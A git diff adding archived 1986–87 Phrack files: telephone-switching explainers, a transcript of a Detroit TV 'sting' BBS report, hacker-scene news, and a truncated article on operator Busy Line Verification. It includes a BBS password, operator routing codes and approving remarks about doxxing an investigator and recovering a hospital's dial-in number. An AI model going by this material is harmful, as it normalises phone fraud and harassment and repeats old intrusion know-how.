+usually a Tandem office. CAMA is usually used to serve class 5 End Offices in
+a rural area near a large city which contains a Tandem or Toll Office. CAMA is
+similar to LAMA, except LAMA is localized in a specific CO and CAMA is not.
+
+* The Directory Number Network and bus system is a network involved with the
+ANI process. It is a grid of vertical and horizontal buses, grouped and class-
+ified as Primary or Secondary. There are 100 vertical and 100 horizontal buses
+in the Primary system. In the Secondary system, there are two sub-groups:Bus
+system #1 and Bus system #2, both of which have ten horizontal and vertical
+buses. These buses as a whole are linked to the Identifier in the ANI trunk
+and are responsible for identifying tens, hundreds, thousands and units digits
+of the calling number (After the Identifier begins its scanning process).
+
+* MDF-Main Distribution Frame. This is the area where all cable pairs of a
+certain office meet, and a third wire, the Sleeve wire, is added. The Sleeve
+wire is what is used in gathering ANI information, as well as determining a
+called lines status (off/on hook) in certain switching systems by presence of
+voltage. (voltage present on Sleeve, line is busy, no voltage, line is idle.)
+
+* ONI-Operator Number Identification. See ANIF footnote.
+
+NOTE: There are also other forms of Automatic Message Accounting, such as LAMA
+(Local Automatic Message Accounting). LAMA is used in the class 5 End Office
+as opposed to CAMA in a Toll Office. If your End Office had LAMA, then the ANI
+information would be recorded at the local level and sent from there. The LAMA
+arrangement may be computerized, in which it would denoted with a C included
+(LAMA-C or C-LAMA).
+
+
+References and acknowledgements
+-------------------------------
+Basic Telephone Switching Systems (Second Edition) by David Talley
+Understanding Telephone Electronics by Radio Shack/Texas Instruments
+
+ Other sysops are allowed to use this file on their systems as long as none of
+it is altered in any way.
+
+-End of file-
+ Jul 12 1986
diff --git a/phrack10/8.txt b/phrack10/8.txt
new file mode 100644
index 0000000..e45498e
--- /dev/null
+++ b/phrack10/8.txt
@@ -0,0 +1,392 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Ten, Phile #8 of 9
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                      <-=*} Phrack World News {*=->                      PWN
+PWN                                                                         PWN
+PWN                            Issue IX/Part One                            PWN
+PWN                                                                         PWN
+PWN                    Compiled, Written, and Edited by                     PWN
+PWN                                                                         PWN
+PWN                            Knight Lightning                             PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+In PWN Issue Seven/Part One, we had an article entitled "Maxfield Strikes
+Again."  It was about a system known as "THE BOARD" in the Detroit 313 NPA.
+The number was 313-592-4143 and the newuser password was "HEL-N555,ELITE,3"
+(then return).  It was kind of unique because it was run off of an HP2000
+computer.  On August 20, 1986 the following message was seen on "THE BOARD."
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+                Welcome to MIKE WENDLAND'S I-TEAM sting board!
+                   (Computer Services Provided By BOARDSCAN)
+                             66 Megabytes Strong
+
+                           300/1200 baud - 24 hours.
+
+                      Three (3) lines = no busy signals!
+                        Rotary hunting on 313-534-0400.
+
+
+Board:   General Information & BBS's
+Message: 41
+Title:   YOU'VE BEEN HAD!!!
+To:      ALL
+From:    HIGH TECH
+Posted:   8/20/86 @ 12.08 hours
+
+Greetings:
+
+You are now on THE BOARD, a "sting" BBS operated by MIKE WENDLAND of the
+WDIV-TV I-Team.  The purpose?  To demonstrate and document the extent of
+criminal and potentially illegal hacking and telephone fraud activity by the
+so-called "hacking community."
+
+Thanks for your cooperation.  In the past month and a half, we've received all
+sorts of information from you implicating many of you to credit card fraud,
+telephone billing fraud, vandalism, and possible break-ins to government or
+public safety computers.  And the beauty of this is we have your posts, your
+E-Mail and--- most importantly ---your REAL names and addresses.
+
+What are we going to do with it?  Stay tuned to News 4.  I plan a special
+series of reports about our experiences with THE BOARD, which saw users check
+in from coast-to-coast and Canada, users ranging in age from 12 to 48.  For our
+regular users, I have been known as High Tech, among other ID's.  John Maxfield
+of Boardscan served as our consultant and provided the HP2000 that this "sting"
+ran on.  Through call forwarding and other conveniences made possible by
+telephone technology, the BBS operated remotely here in the Detroit area.
+
+When will our reports be ready?  In a few weeks.  We now will be contacting
+many of you directly, talking with law enforcement and security agents from
+credit card companies and the telephone services.
+
+It should be a hell of a series.  Thanks for your help.  And don't bother
+trying any harassment.  Remember, we've got YOUR real names.
+
+Mike Wendland
+The I-team
+WDIV, Detroit, MI.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+This then is the result:
+
+Phrack World News proudly presents...
+
+                    Mike Wendland & the I-Team Investigate
+                            "Electronic Gangsters"
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Carman Harlan:  Well we've all heard of computer hackers, those electronic
+                gangsters who try to break into other people's computer
+                systems.  Tonight on the first of a three part news 4 [WDIV-TV,
+                Channel 4 in Detroit] extra, Mike Wendland and the I-Team will
+                investigate how such computer antics jeopardize our privacy.
+                Mike joins us now to tell us what at first may have been
+                innocent fun may now be affecting our pocket books.
+
+Mike Wendland:  Well Carman and Mort, thanks to the media and movies just about
+                everyone knows about hackers and phone phreaks.  By hooking
+                their Apples, their Ataris, and their Commodores into telephone
+                lines these electronic enthusiasts have developed a new form of
+                communication, the computer bulletin board.  There are probably
+                10,000 of these message swapping boards around the country
+                today, most are innocent and worthwhile.  There are an
+                estimated 1,000 pirate or hacker boards where the main
+                activities are electronic trespassing, and crime [Estimates
+                provided by John Maxfield].
+
+[Clipping From Wargames comes on]
+
+                In movies like Wargames computer hackers are portrayed as
+                innocent hobbyist explorers acting more out of mischief than
+                malice.  But today a new generation of hackers have emerged.  A
+                hacker that uses his knowledge of computers to commit crimes.
+                Hackers have electronically broken into banks, ripped off
+                telephone companies for millions of dollars, trafficked in
+                stolen credit card numbers, and through there network of
+                computer bulletin boards traded information on everything from
+                making bombs to causing terrorism.
+
+[Picture of John Maxfield comes on]
+
+John Maxfield:  Well, now there are electronic gangsters, not just electronic
+                explorers they are actually gangsters.  These hackers meet
+                electronically through the phone lines or computer bulletin
+                boards.  They don't meet face to face usually, but it is a
+                semi-organized gang stile activity, much like a street gang, or
+                motorcycle gang.
+
+Mike Wendland:  John Maxfield of Detroit is America's foremost "Hacker
+                Tracker".  He has worked for the F.B.I. and various other law
+                enforcement and security organizations.  Helping catch dozens
+                of hackers around the country, who have used their computers
+                for illegal purposes.  To find out how widespread these
+                electronic gangsters have become, we used John Maxfield as a
+                consultant to setup a so-called "sting" bulletin board [THE
+                BOARD].
+
+                We wrote and designed a special program that would allow us to
+                monitor the calls we received and to carefully monitor the
+                information that was being posted.  We called our undercover
+                operation "The Board", and put the word out on the underground
+                hacker network that a new bulletin board was in operation for
+                the "Elite Hacker".  Then we sat back and watched the computer
+                calls roll in.
+
+                In all we ran our so called "Sting" board for about a month and
+                a half, 24 hours a day, 7 days a week.  We received literally
+                hundreds of phone calls from hackers coast to coast, ranging in
+                age from 17 to 43.  All of them though had one thing in common,
+                they were looking for ways to cheat the system.
+
+                The hackers identified themselves by nicknames or handles like
+                CB radio operators use, calling themselves things like Ax
+                Murderer, Big Foot, and Captain Magic.  They left messages on a
+                variety of questionable subjects, this hacker for instance told
+                how to confidentially eavesdrop on drug enforcement radio
+                conversations.  A New York hacker called The Jolter swapped
+                information on making free long-distance calls through stolen
+                access codes, and plenty of others offered credit card numbers
+                to make illegal purchases on someone else's account.
+
+John Maxfield:  Well these kids trade these credit card numbers through the
+                computer bulletin boards much like they'd trade baseball cards
+                at school.  What we've seen in the last few years is a series
+                of hacker gangs that are run by an adult, sort of the
+                mastermind who stays in the background and is the one who
+                fences the merchandise that the kids order with the stolen
+                credit cards.
+
+Mike Wendland:  Then there were the malicious messages that had the potential
+                to do great harm.  The Repo Man from West Virginia left this
+                message telling hackers precisely how to break into a hospital
+                computer in the Charleston, WV area.
+
+[Picture of Hospital]
+
+                This is where that number rings, the Charleston Area Medical
+                Center.  We immediately notified the hospital that there
+                computer security had been breached.  Through a spokesperson,
+                the hospital said that a hacker had indeed broken into the
+                hospital's computer and had altered billing records.  They
+                immediately tightened security and began an investigation.
+                They caught the hacker who has agreed to make restitution for
+                the damages.  Maxfield says though, "Most such break-ins are
+                never solved".
+
+John Maxfield:  When you are talking about electronic computer intrusion, it's
+                the perfect crime.  It's all done anonymously, it's all done by
+                wires, there's no foot prints, no finger prints, no blood
+                stains, no smoking guns, nothing.  You may not even know the
+                system has been penetrated.
+
+Mike Wendland:  Our experience with the "Sting" bulletin board came to a sudden
+                and unexpected end.  Our cover was blown when the hackers
+                somehow obtained confidential telephone company records.  The
+                result a campaign of harassment and threats that raised serious
+                questions about just how private our supposedly personal
+                records really are.  That part of the story tomorrow.  [For a
+                little more detail about how their cover was "blown" see PWN
+                Issue 7/Part One, "Maxfield Strikes Again."  Heh heh heh heh.]
+
+Mort Crim:  So these aren't just kids on a lark anymore, but who are the
+            hackers?
+
+Mike Wendland:  I'd say most of them are teenagers, our investigation has
+                linked about 50 of them hardcore around this area, but most
+                very young.
+
+Mort Crim:  Far beyond just vandalism!
+
+Mike Wendland:  Yep.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+A few quicknotes in between shows, Mike Wendland and John Maxfield set up THE
+BOARD.  Carman Harlan and Mort Crim are newscasters.
+
+Also if anyone is interested in the stupidity of Mike Wendland, he flashed the
+post that contained the phone number to the hospital across the screen, Bad
+Subscript put the VCR on pause and got the number.  If interested please
+contact Bad Subscript, Ctrl C, or myself.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Carman Harlan:  Tonight on the second part of a news 4 [WDIV-TV, Channel 4 in
+                Detroit] extra Mike Wendland and the I-Team report on how they
+                setup a sting bulletin board to see how much they could get on
+                these criminal hackers.  Mike joins us now to explain that
+                information, that was not the only thing they got.
+
+Mike Wendland:  That's right, Carman & Mort.  Our so called sting bulletin
+                board received hundreds of calls from hackers all over America,
+                and even Canada.  They offered to trade stolen credit cards,
+                and they told how to electronically break into sensitive
+                government computers.  But our investigation came to a sudden
+                end when our sting board was stung.  Our cover was blown when
+                a hacker discovered that this man, computer security expert
+                John Maxfield was serving as the I-Team consultant on the
+                investigation.  Maxfield specializes as a hacker tracker and
+                has worked for the F.B.I. and various other police and security
+                agencies.  The hacker discovered our sting board by getting a
+                hold of Maxfield's supposedly confidential telephone records.
+
+John Maxfield:  And in the process of doing that he discovered the real number
+                to the computer.  We were using a different phone number that
+                was call forwarded to the true phone number, he found that
+                number out and called it to discover he was on the sting board.
+
+Mike Wendland:  But the hacker didn't stop at exposing the sting, instead he
+                posted copies of Maxfield's private telephone bill on other
+                hacker bulletin boards across the country.
+
+John Maxfield:  The harassment started, all of the people on my phone bill got
+                calls from hackers.  In some cases their phone records were
+                also stolen, friends and relatives of theirs got calls from
+                hackers.  There was all sorts of other harassment, I got a call
+                from a food service in Los Angeles asking where I wanted the
+                500 pounds of pumpkins delivered.  Some of these kids are
+                running around with guns, several of them made threats that
+                they were going to come to Detroit, shoot me and shoot Mike
+                Wendland.
+
+Mike Wendland:  A spokesperson from Michigan Bell said that the breakdown in
+                security that led to the release of Maxfield's confidential
+                records was unprecedented.
+
+Phil Jones (MI Bell):  I think as a company were very concerned because we work
+                       very hard to protect the confidentially of customer's
+                       records.  [Yeah, right].
+
+Mike Wendland:  The hacker who got a hold of Maxfield's confidential phone
+                records is far removed from Michigan, he lives in Brooklyn, NY
+                and goes by the name Little David [Bill From RNOC].  He says
+                that getting confidential records from Michigan Bell or any
+                other phone company is child's play. Little David is 17 years
+                old.  He refused to appear on camera, but did admit that he
+                conned the phone company out of releasing the records by simply
+                posing as Maxfield.  He said that he has also sold pirated
+                long-distance access codes, and confidential information
+                obtained by hacking into the consumer credit files of T.R.W.
+                Little David says that one of his customers is a skip-tracer, a
+                private investigator from California who specializes in finding
+                missing people.  Maxfield, meanwhile, says that his own
+                information verified Little David's claim.
+
+John Maxfield:  The nearest I can determine the skip-tracer was using the
+                hacker, the 17 year old boy to find out the whereabouts of
+                people he was paid to find.  He did this by getting into the
+                credit bureau records for the private eye.  This is an invasion
+                of privacy, but it's my understanding that this boy was getting
+                paid for his services.
+
+Mike Wendland:  In Long Island in New York, Maxfield's telephone records were
+                also posted on a bulletin board sponsored by Eric Corley,
+                publisher of a hacker newsletter [2600 Magazine].  Corley
+                doesn't dispute the harassment that Maxfield received.
+
+Eric Corley:  Any group can harass any other group, the difference with hackers
+              is that they know how to use particular technology to do it.  If
+              you get a malevolent hacker mad at you there's no telling all the
+              different things that can happen.
+
+Mike Wendland:  What can happen?  Well besides getting your credit card number
+                or charging things to your account, hackers have been known to
+                change people's credit ratings. It is really serious business!
+                And tomorrow night we'll hear about the hacker philosophy which
+                holds that if there is information out there about you it is
+                fair game.
+
+Mort Crim:  "1984" in 1986.
+
+Mike Wendland:  It is!
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Carman Harlan:  News four [WDIV-TV, Channel 4 in Detroit] extra, Mike Wendland
+                and the I-Team look at how these hackers are getting out of
+                hand.
+
+Mike Wendland:  The problem with hackers is not just with mischief anymore,
+                unscrupulous hackers are not only invading your privacy, they
+                are costing you money.  Case and point, your telephone bills,
+                because American telephone companies have long been targets of
+                computer hackers and thieves we are paying more than we should.
+                Experts say the long distance companies lose tens of millions
+                of dollars a year to, these self described "Phone Phreaks."
+
+                For example in Lansing, the Michigan Association of
+                Governmental Employees received a phone bill totalling nearly
+                three hundred and twenty one thousand dollars.  For calls
+                illegally racked up on there credit card by hackers.  Such
+                victims seldom get stuck paying the charges, so hackers claim
+                there piracy is innocent fun.
+
+Phil Jones (MI Bell):  Nothing could be further from the truth, it becomes a
+                       very costly kind of fun.  What happens is that the
+                       majority of the customers who do pay there bills on
+                       time, and do use our service lawfully end up quitting
+                       after that bill.
+
+Mike Wendland:  That's not all, hackers regularly invade our privacy, they
+                leave pirated credit card numbers and information how to break
+                into electronic computer banks on bulletin boards.  Thousands
+                of such electronic message centers exist across the country,
+                most operated by teenagers.
+
+John Maxfield:  There is no law enforcement, no parental guidance, they're just
+                on their own so they can do anything they want.  So the few bad
+                ones that know how to steal and commit computer crimes teach
+                the other ones.
+
+Mike Wendland:  There is very little that is safe from hackers, from automatic
+                teller machines and banks to the internal telephone systems at
+                the White House.  Hackers have found ways around them all
+                hackers even have their own underground publication of sorts
+                that tells them how to do it.
+
+[Close up of publication]
+
+                Its called 2600 [2600 Magazine], after the 2600 hertz that
+                phone phreaks use to bypass telephone companies billing
+                equipment.  It tells you how to find credit card numbers and
+                confidential records in trash bins, break into private
+                mainframe computers, access airline's computers, and find
+                financial information on other people through the nations
+                largest credit bureau, TRW.  2600 is published in a
+                ram-shackled old house at the far end of Long Island, New York
+                by this man, Eric Corley.  He argues that hackers aren't
+                electronic gangsters.
+
+Eric Corley:   We like to call them freedom fighters.  Hackers are the true
+               individuals of the computer revolution, they go were people tell
+               them not to go, they find out things they weren't supposed to
+               find out.
+
+Mike Wendland:  Corley's newsletter supports a hacker bulletin board called the
+                Private Sector.  Last year the F.B.I. raided it.
+
+Eric Corley:  They managed to charge the system operator with illegal
+              possession of a burglary tool in the form of a computer program.
+
+Mike Wendland:  But the bulletin board is still in operation.  Corley resents
+                the suspicion that hackers are involved in criminal activities.
+
+Eric Corley:  Hackers are not the people who go around looking for credit cards
+              and stealing merchandise.  That's common thievery. Hackers are
+              the people who explore.  So basically what we are saying is more
+              knowledge for more people.  That will make it better for
+              everybody.
+
+Mike Wendland:  He claims that hackers, in their own ways, really protect our
+                rights by exposing our vulnerabilities.  Well hackers may
+                expose our vulnerabilities, but they also invade our privacy.
+                There activities have really spotlighted the whole question of
+                privacy raised by the massive files that are now out there in
+                electronic data banks.  Much of that information that we think
+                is personal and confidential is often available to the whole
+                world.
+
+
+
+                   Original transcript gathered and typed by
+
+                            Ctrl C & Bad Subscript
+
+                       Major editing by Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack10/9.txt b/phrack10/9.txt
new file mode 100644
index 0000000..c07632e
--- /dev/null
+++ b/phrack10/9.txt
@@ -0,0 +1,298 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Ten, Phile #9 of 9
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                      <-=*} Phrack World News {*=->                      PWN
+PWN                                                                         PWN
+PWN                            Issue IX/Part Two                            PWN
+PWN                                                                         PWN
+PWN                    Compiled, Written, and Edited by                     PWN
+PWN                                                                         PWN
+PWN                            Knight Lightning                             PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+On The Home Front                                             December 25, 1986
+-----------------
+  Happy Holidays to all from everyone at Phrack Inc. and Metal Shop Private!
+
+Well, here we are at that time of year again and before too long we will have a
+new wave of self appointed hackers who got their modems for Christmas.
+
+Some important dates to point out:
+
+November 17, 1986............1st Anniversary of Phrack Inc.
+January 2, 1987..............1st Anniversary of Metal Shop being a PRIVATE BBS.
+January 10, 1987.............1st Anniversary of Metal Shop AE, now Quick Shop
+January 25, 1987.............1st Anniversary of Phrack World News
+
+The Phrack Inc./Metal Shop Private Voice Mailbox is now back in operation.  If
+you have a question for Taran King, Cheap Shades, or myself and cannot reach us
+through regular means, please leave us a message on our VMS.
+
+Thanks to the efforts of Oryan Quest, an upcoming Phrack Pro-Phile will focus
+on Steve Wozniak.
+
+Plans are already underway for Summer Con '87.  It is to be held in St. Louis,
+Missouri during the last week of June.  It is being sponsored by TeleComputist
+Newsletter, Phrack Inc., and Metal Shop Private.  Forest Ranger is in charge of
+planning and is putting out a lot of front money for the necessary conference
+rooms and such.  There will be a mandatory $10 admittance at the door to Summer
+Con '87.  If you will be attending this conference, please as an act of
+good faith and to save 50% send $5 in early to:
+
+                                   J. Thomas
+                           TeleComputist Newsletter
+                                 P.O. Box 2003
+                        Florissant, Missouri 63032-2003
+
+Also, Letters to the Editor and anything else dealing with TeleComputist can be
+sent to the same address.  TeleComputist can also be reached through Easylink
+at 62195770, MCI Telex at 650-240-6356, CIS at 72767,3207 and PLINK at OLS 631.
+Try MCI and Easylink first.
+
+ Not much else to say... so keep learning and try not to get into any trouble.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Computer Hackers Beware! - Senate Passes Computer Fraud And Abuse Act
+------------------------   ------------------------------------------
+On October 2, 1986, the US Senate unanimously passed the Computer Fraud and
+Abuse Act of 1986.  The bill, S. 2281, imposes fines of up to $500,000 and/or
+prison terms of up to 20 years for breaking into government or financial
+institutions' computers.
+
+The Federal Government alone operates more than 18,000 medium-scale and
+large-scale computers at some 4,500 different sites.  The Office of Technology
+Assessment estimates the government's investment in computers over the past
+four years at roughly $60 million.  The General Services Administration
+estimates that there will be 250,000 to 500,000 computers in use by the Federal
+Government by 1990.
+
+In 1984, legislators' attention to and concern about computer fraud was
+heightened by a report by the American Bar Association task force on computer
+crime.  According to the report, based on a survey of 1,000 private
+organizations and public agencies, forty-five percent of the 283 respondents
+had been victimized by some form of computer crime, and more than 25 percent
+had sustained financial losses totaling between an estimated $145 million and
+$730 million during one twelve month period.
+
+To address this problem, the Senate and House enacted, in 1984, the first
+computer statute (18 U.S.C. 1030).  Early this year both the House and Senate
+introduced legislation to expand and amend this statute.
+
+In the current bill, which is expected to be signed by President Reagan next
+week, penalties will be imposed on anyone who knowingly or intentionally
+accesses a computer without authorization, or exceeds authorized access and:
+
+(1) Obtains from government computers information relating to national defense
+    and foreign relations.
+
+(2) Obtains information contained in financial records of financial
+    institutions.
+
+(3) Affects the use of the government's operation of a computer in any
+    department or agency of the government that is exclusively for the use of
+    the U.S. Government.
+
+(4) Obtains anything of value, unless the object of the fraud and the thing
+    obtained consists only of the use of the computer.
+
+(5) Alters, damages, or destroys information in any federal interest computer,
+    or prevents authorized use of any such computer or information.
+
+Under the bill, a person would be guilty of computer fraud if he or she causes
+a loss of $1,000 or more during any one year period.
+
+Depending on the offense, penalties include fines up to $100,000 for a
+misdemeanor, $250,000 for a felony, $500,000 if the crime is committed by an
+organization, and prison terms of up to 20 years.
+
+The bill also prohibits traffic in passwords and other information from
+computers used for interstate or foreign commerce.  This part of the bill makes
+it possible for Federal Prosecutors to crack down on pirate bulletin boards and
+similar operations because the bill covers business computers, online networks,
+and online news and information services, all of which are considered
+interstate commerce.
+
+                            Information provided by
+
+                            P - 8 0   S y s t e m s
+_______________________________________________________________________________
+
+GTE News                                                      December 20, 1986
+--------
+    "GTE Develops High-Speed GaAs Multiplexer Combining Four Data Channels"
+
+In an effort to achieve data communication rates of several gigabits per
+second, GTE Labs (Waltham, MA) is combining the high-capacity of fiber optics
+with the high speed of gallium arsenide circuits.  The research arm of GTE has
+designed a GaAs multiplexer that can combine four data channels, each with a
+communication rate of 1 gigabit per second, into one channel.  GTE has also
+recently developed a technique called MOVPE (metal-organic vapor-phase
+epitaxy) for efficiently growing thin-film GaAs crystals.
+
+The new devices should play an important role in future communication systems,
+which will involve high-capacity fiber-optic cables connecting houses and
+offices through telephone switching centres.  Data rates on these cables could
+be as high as 20 gigabits per second.  In addition to standard computer data,
+numerous video channels could be supported, each with a data rate of almost
+100 megabits per second.  The GaAs multiplexers will probably be the only
+devices fast enough to interface houses and offices through this fiber-optic
+grid.  In future supercomputers [misuse of the word -eds.] these multiplexers
+will also be used for high-speed fiber-optic transmissions between various
+boards in the computer, replacing copper wires.  Because of the high-speed
+nature of the fiber-optic link, such techniques may even be used for chip-to-
+chip communication.
+
+GTE said it has completed a prototype of the GaAs multiplexer and a final
+version should be ready in less than a year.
+
+Comments:  And meanwhile, while GTE's been building gigabit/second
+           multiplexers, AT&T Bell Labs is still experimenting with the neuron
+           webs from slug brains...
+
+             Information from Byte Magazine, December 1986, Page 9
+
+                      Typed & Commented on by Mark Tabas
+_______________________________________________________________________________
+
+The LOD/H Technical Journal
+---------------------------
+The Legion Of Doom/Hackers Technical Journal is a soft-copy free newsletter
+whose primary purpose is to further the knowledge of those who are interested
+in topics such as:  Telecommunications, Datacommunications, Computer & Physical
+Security/Insecurity and the various technical aspects of the phone system.
+
+The articles are totally original unless otherwise stated.  All sources of
+information for a specific article are listed in the introduction or conclusion
+of the article. They will not accept any articles that are unoriginal,
+plagiarized, or contain invalid or false information.  Articles will be
+accepted from anyone who meets those criteria.  They are not dependant upon
+readers for articles, since members of LOD/H and a select group of others will
+be the primary contributors, but anyone can submit articles.
+
+There is no set date for releasing issues, as they have no monetary or legal
+obligation to the readers, but they predict that issues will be released
+every 2 or 3 months.  Thus, expect 4 to 6 issues a year assuming that they
+continue to produce them, which they intend to do.
+
+The bulletin boards sponsoring the LOD/H TJs include:
+
+                                   Atlantis
+                          Digital Logic Data Service
+                            Hell Phrozen Over (HPO)
+                              Metal Shop Private
+                                Private Sector
+                                 The Shack //
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+The first issue will include these articles;
+
+-  Introduction to the LOD/H Technical Journal and Table Of Contents
+
+-  Editorial:  "Is the law a deterrent to computer crime?" by Lex Luthor
+
+-  Local Area Signalling Services (LASS) by The Videosmith
+
+-  Identifying and Defeating Physical Security and Intrusion Detection Systems
+   Part I: The Perimeter by Lex Luthor
+
+-  Traffic Service Position System (TSPS) by The Marauder
+
+-  Hacking DEC's TOPS-20:  Intro by Blue Archer
+
+-  Building your own Blue Box (Includes Schematic) by Jester Sluggo
+
+-  Intelligence and Interrogation Processes by Master Of Impact
+
+-  The Outside Loop Distribution Plant:  Part I by Phucked Agent 04
+
+-  The Outside Loop Distribution Plant:  Part II by Phucked Agent 04
+
+-  LOH Telenet Directory: Update #4 (12-9-86) Part I by LOH
+
+-  LOH Telenet Directory: Update #4 (12-9-86) Part II by LOH
+
+-  Network News & Notes by "Staff"
+
+That's a total of 13 files...
+
+That ends the preview, the newsletter is due to be released by January 1, 1987
+so watch for it!
+                            Information Provided by
+
+        Lex Luthor & The Legion Of Doom/Hackers Technical Journal Staff
+_______________________________________________________________________________
+
+Texas Rumors Run Rampant                                      December 24, 1986
+------------------------
+Remember all that controversy about Sir Gamelord being Videosmith?
+
+Well here's the story...
+
+It all started on a conference bridge, where a number of people including Evil
+Jay, Line Breaker [who, indirectly started all of this], and Blade Runner among
+others were having a discussion.
+
+Line Breaker was telling a story of how Videosmith was a fed, how Videosmith
+had busted everyone at a phreak con (or something like that), and how he [Line
+Breaker] and some other people called Videosmith up, pretending to be feds, and
+got him to admit that he did these things.
+
+Blade Runner was terribly pissed at Sir Gamelord (who had recently attempted to
+take over P.H.I.R.M., which is Blade Runner's group).  As a retaliatory strike
+and after hearing this slander upon Videosmith's name, Blade Runner started
+telling people that Sir Gamelord was Videosmith.  The stories have been getting
+more and more exaggerated since then but that is all that really happened.
+
+[They say everything is bigger in Texas...I guess that includes bullshit too!]
+
+                       Information Provided by Evil Jay
+_______________________________________________________________________________
+
+The Cracker Disappears                                        December 27, 1986
+----------------------
+The rumors and stories are flying around about the disappearance of one
+Bill Landreth aka The Cracker.
+
+Bill Landreth is the author of "Out Of The Inner Circle," a book on hackers
+that was published a few years back.
+
+According to newspaper articles in the San Francisco area, Bill was at a
+friend's home working on some computer program.  His friend stepped out for a
+while and when he returned, there was a lot of garbage on screen and a suicide
+message.
+
+On Ripco BBS, message was posted about Bill Landreth, stating that he had
+disappeared, and was once again wanted by the FBI.  The message asked that
+anyone in contact with Bill would tell him to contact his "friends."
+
+Most of what is going on right now is bogus rumors.  There may be a follow up
+story in the next PWN.
+
+                            Information Provided By
+
+                  The Prophet/Sir Frances Drake/Elric Of Imrryr
+_______________________________________________________________________________
+
+U.S. Sprint Screws Up                                         December 24, 1986
+---------------------
+Taken From the Fort Lauderdale Sun Sentinal
+
+                          "He got a 1,400 page bill!"
+
+In Montrose, Colorado, Brad Switzer said he thought the box from the U.S.
+Sprint  Long Distance Company was an early Christmas present until he opened it
+and found that it contained a 1,400 page phone bill.
+
+The $34,000 bill was delivered to Switzer's doorstep Monday.  He called U.S.
+Sprint's Denver office, where company officials assured him he was "Off the
+Hook."  A spokesman for U.S. Sprint said that Switzer had mistakenly received
+U.S. Sprint's own phone bill for long distance calls.
+
+                         Typed For PWN by The Leftist
+_______________________________________________________________________________
+
diff --git a/phrack11/1.txt b/phrack11/1.txt
new file mode 100644
index 0000000..f660054
--- /dev/null
+++ b/phrack11/1.txt
@@ -0,0 +1,32 @@
+                               ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #1 of 12
+
+                                    Index
+                                    ~~~~~
+                                   2/17/87
+
+         Welcome to Issue Eleven of the Phrack Inc. electronic newsletter.
+This issue, I was a bit more reliable about getting the issue out (yes, only 3
+days late!).  This issue did not come together as easily as I would have hoped
+due to a number of people being difficult to get a hold of or getting their
+files, but I filled their places in with other files, so if you had been told
+you would have a file in this issue, get in contact with me so that it will be
+featured in Issue Twelve.  The following files are featured in this edition of
+Phrack Inc.:
+
+#1  Index to Phrack Eleven by Taran King (1.7K)
+#2  Phrack Pro-Phile VIII on Wizard of Arpanet by Taran King (6.8K)
+#3  PACT: Prefix Access Code Translator by The Executioner (7.6K)
+#4  Hacking Voice Mail Systems by Black Knight from 713 (6.0K)
+#5  Simple Data Encryption or Digital Electronics 101 by The Leftist (4.1K)
+#6  AIS - Automatic Intercept System by Taran King (15.9K)
+#7  Hacking Primos I, II, III by Evil Jay (6.7K)
+#8  Telephone Signalling Methods by Doom Prophet (7.3K)
+#9  Cellular Spoofing By Electronic Serial Numbers donated by Amadeus (15.2K)
+#10 Busy Line Verification by Phantom Phreaker (10.0K)
+#11 Phrack World News X by Knight Lightning
+#12 Phrack World News XI by knight Lightning
+
+                                            Taran King
+                                   Sysop of Metal Shop Private
diff --git a/phrack11/10.txt b/phrack11/10.txt
new file mode 100644
index 0000000..6cfcd8f
--- /dev/null
+++ b/phrack11/10.txt
@@ -0,0 +1,157 @@
+                               ==Phrack Inc.==
+
+                  Volume Two, Issue Eleven, Phile #10 of 12
+
+                            BUSY LINE VERIFICATION
+
+                         WRITTEN BY PHANTOM PHREAKER
+
+
+    This file describes how a TSPS operator does a BLV (Busy Line
+Verification) and an EMER INT (Emergency Interrupt) upon a busy line that a
+customer has requested to be 'broken' into. I have written this file to
+hopefully clear up all the misconceptions about Busy Line Verification and
+Emergency Interrupts.
+
+    BLV is 'Busy Line Verification'. That is, discovering if a line is
+busy/not busy. BLV is the telco term, but it has been called Verification,
+Autoverify, Emergency Interrupt, break into a line, REMOB, and others. BLV is
+the result of a TSPS that uses a Stored Program Control System (SPCS) called
+the Generic 9 program. Before the rise of TSPS in 1969, cordboard operators
+did the verification process. The introduction of BLV via TSPS brought about
+more operator security features. The Generic 9 SPCS and hardware was first
+installed in Tucson, Daytona, and Columbus, Ohio, in 1979. By now virtually
+every TSPS has the Generic 9 program.
+
+    A TSPS operator does the actual verification. If caller A was in the 815
+Area code, and caller B was in the 314 Area code, A would dial 0 to reach a
+TSPS in his area code, 815. Now, A, the customer, would tell the operator he
+wished an emergency interrupt on B's number, 314+555+1000. The 815 TSPS op who
+answered A's call cannot do the interrupt outside of her own area code, (her
+service area), so she would call an Inward Operator for B's area code, 314,
+with KP+314+TTC+121+ST, where the TTC is a Terminating Toll Center code that
+is needed in some areas. Now a TSPS operator in the 314 area code would be
+reached by the 815 TSPS, but a lamp on the particular operators console would
+tell her she was being reached with an Inward routing. The 815 operator then
+would say something along the lines of  she needed an interrupt on
+314+555+1000, and her customers name was J. Smith. Now, the 314 Inward (which
+is really a TSPS) would dial B's number, in a normal Operator Direct Distance
+Dialing (ODDD) fashion. If the line wasn't busy, then the 314 Inward would
